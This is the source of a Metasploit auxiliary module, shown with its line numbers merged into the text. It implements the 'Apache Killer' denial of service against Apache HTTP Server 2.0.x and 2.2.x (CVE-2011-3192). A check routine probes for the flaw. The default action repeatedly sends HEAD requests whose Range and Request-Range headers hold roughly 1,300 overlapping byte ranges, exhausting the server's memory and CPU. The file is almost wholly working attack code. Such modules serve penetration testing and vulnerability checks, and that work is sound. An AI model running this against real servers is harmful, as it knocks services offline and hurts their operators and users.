Path: blob/master/modules/auxiliary/dos/http/apache_range_dos.rb
19566 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report9include Msf::Auxiliary::Dos1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Apache Range Header DoS (Apache Killer)',16'Description' => %q{17The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x18through 2.2.19 allows remote attackers to cause a denial of service (memory and19CPU consumption) via a Range header that expresses multiple overlapping ranges,20exploit called "Apache Killer".21},22'Author' => [23'Kingcope', # original discovery24'Masashi Fujiwara', # metasploit module25'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability26],27'License' => MSF_LICENSE,28'Actions' => [29['DOS', { 'Description' => 'Trigger Denial of Service against target' }],30['CHECK', { 'Description' => 'Check if target is vulnerable' }]31],32'DefaultAction' => 'DOS',33'References' => [34[ 'BID', '49303'],35[ 'CVE', '2011-3192'],36[ 'EDB', '17696'],37[ 'OSVDB', '74721' ],38],39'DisclosureDate' => '2011-08-19',40'Notes' => {41'AKA' => ['Apache Killer'],42'Stability' => [CRASH_SERVICE_DOWN],43'SideEffects' => [],44'Reliability' => []45}46)47)4849register_options(50[51Opt::RPORT(80),52OptString.new('URI', [ true, 'The request URI', '/']),53OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])54]55)56end5758def run_host(_ip)59case action.name60when 'DOS'61conduct_dos6263when 'CHECK'64check_for_dos65end66end6768def check_for_dos69uri = datastore['URI']70rhost = datastore['RHOST']71res = send_request_cgi({72'uri' => uri,73'method' => 'HEAD',74'headers' => {75'HOST' => rhost,76'Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10',77'Request-Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10'78}79})8081if res && res.code == 20682print_status("Response was #{res.code}")83print_status("Found Byte-Range Header DOS at #{uri}")8485report_note(86:host => rhost,87:port => rport,88:type => 'apache.killer',89:data => { :uri => uri }90)9192else93print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")94end95rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e96vprint_error(e.message)97end9899def conduct_dos100datastore['URI']101rhost = datastore['RHOST']102ranges = ''103104for i in (0..1299) do105ranges += ',5-' + i.to_s106end107108for x in 1..datastore['RLIMIT']109begin110print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")111_res = send_request_cgi(112{113'uri' => uri,114'method' => 'HEAD',115'headers' => {116'HOST' => rhost,117'Range' => "bytes=0-#{ranges}",118'Request-Range' => "bytes=0-#{ranges}"119}120},1211122)123rescue ::Rex::ConnectionRefused124print_error("Unable to connect to #{rhost}:#{rport}")125rescue ::Errno::ECONNRESET126print_good("DoS packet successful. #{rhost} not responding.")127rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout128print_error("Couldn't connect to #{rhost}:#{rport}")129rescue ::Timeout::Error, ::Errno::EPIPE => e130vprint_error(e.message)131end132end133end134end135136137